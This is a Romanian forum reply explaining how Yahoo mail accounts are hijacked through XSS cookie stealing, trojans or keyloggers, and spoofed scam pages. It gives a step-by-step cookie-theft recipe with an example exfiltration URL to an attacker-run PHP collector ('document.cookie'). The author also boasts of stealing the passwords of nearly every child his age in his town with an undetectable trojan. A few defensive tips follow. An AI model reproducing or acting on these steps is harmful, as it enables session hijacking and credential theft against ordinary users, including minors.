Multumesc de primirea calduroasa !
Intrebarea ta este atat de complexa incat o poti compara cu o intrebare de genul "cum pot sa imi fac o casa repede"Postat în original de mike_ppc
.
In primul rand nu este etic sa schimbi o parola, nici in randul "intunecatilor" nu se mai practica asta , majoritatea doar spioneaza
Sper ca m-ai intrebat ca sa te protejezi
1.Cookie Stealing.
-ce este un cookie ? Un cookie se obtine atunci cand pe pagina de login de la yahoo introduci un username si o parola , cookieul este generat pentru a iti usura tie ( utilizatorul mailului ) navigatia , pentru a nu fi nevoit sa iti introduci parola la fiecare miscare din mail.
In cazul Yahoo , cookieul in mod normal dureaza 24 de ore insa poate fi prelungit si la 2 saptamanii ( metoda privata ).
-cum poate fi furat un cookie ? Un cookie poate fi furat destul de usor , tot ce ai nevoie este un script php si o vulnerabilitate XSS [ Cross Site Scripting ] , aceste vulnerabilitati se gasesc destul de usor in domeniile Yahoo daca stii sa cauti.
In cazul Yahoo , cookieul este acelasi indiferent de domeniu ca e de China,Italia etc.
- cum functioneaza metoda in pratica ?
Metoda consta intr-un script php ( cookie stealer ) care primeste prin intermediul XSS`ului care devine un fel de "tunel" cookieurile utilizatorilor si pe care le stocheaza intr-un fisier de regula .txt
Odata ce sunt colectate aceste cookieuri ele pot fi folosite pentru a accesa mailul ( victimei ) si webmessengerul acestuia.
Am sa iti descriu in 5 pasi cum opereaza un atacator pentru a fura un cookie.
a) Isi urca pe internet un script php pentru a colecta cookieurile ex atacator_domeniu . com /script_php?cookie=document.cookie
b) Editeaza XSSul in functie de locatia cookie stealerului sau adica :
yahoo . com /pagina?param=XSS(url_cookie_stealer
c) Trimite victimei urlul din Yahoo cu XSS si asteapta ca prada sa cada in capcana
d) Cazurile cand utilizatorul poate devenii prada :
- s-a autentificat pe o pagina yahoo in ultimele 24 de ore si foloseste un browser care pastreaza sesiunea activa. In acest caz este destul de usor de furat , poate fi furat chiar si printr`un iframe
- a intrat pe link`ul capcana din interiorul mailului ( propriu )
e) Atacatorul a obtinut cookieul iar acum se plimba pe la tine prin mail
Metoda aceasta este destul de folosita in ziua de azi , pentru protectie recomand :
- sa dati Sign Out din mail dupa ce ati termiant de citit
- optional sa folositi un addon care blocheaza javascript , eu folosesc NoScript
- sa nu va puneti rau cu persoanele care sunt capabile de a va face rau
Din cate stiu cookieul generat contine in interiorul sau parola insa algoritmul folosit nu il cunosc , probabil ca exista persoane care pot sa decripteze parola din cookie insa cu siguranta metoda este privata
2. Trojani/Keyloggere
Asta e metoda clasica,urata,plictisitoare .. nu imi place sa vorbesc despre ea.
Dar este o metoda destul de eficace uneori. Imi aduc aminte ca acum aproximativ 9 luni cu ajutorul unui trojan nedetectabil facut de o persoana reusisem sa capat idurile si parolele la aproape toti copii de varsta mea din oras. ( e un oras cu 20 de mii loc. )
Metoda asta este destul de greu de pus in pratica. Insa atentie , ea poate devenii foarte periculoasa daca :
- trojanul/keyloggerul este nedetectabil
- utilizatorul are cunostinte de JavaScript avansate si poate scrie un o aplicate care sa faca auto download/execute adica sa intri pe site . com / pagina
Iar codul JS sa downloadeze la tine in PC aplicatia si sa o execute
3. Scam
Metoda asta e prea plictisitoare , in general e este folosita si de baietii care fac phishing ( cei care fura carduri pe la TV ).
Uneori poate fi si aceasta o metoda periculoasa , de exemplu atacatorul poate face url spoofing si tie sa iti apara mail . yahoo . com cand tu de fapt sa fii pe un domeniu te_am_furat . com / scam
Sper ca developerii vor intelege cat de important este sa iti filtrezi datele intr`o aplicatie si cat de periculoasa poate fi o vulnerabilitate XSS.
Cam acestea ar fi , metodele cele mai folosite.
Metode mai sunt insa cu siguranta private .
Răspunde cu citat
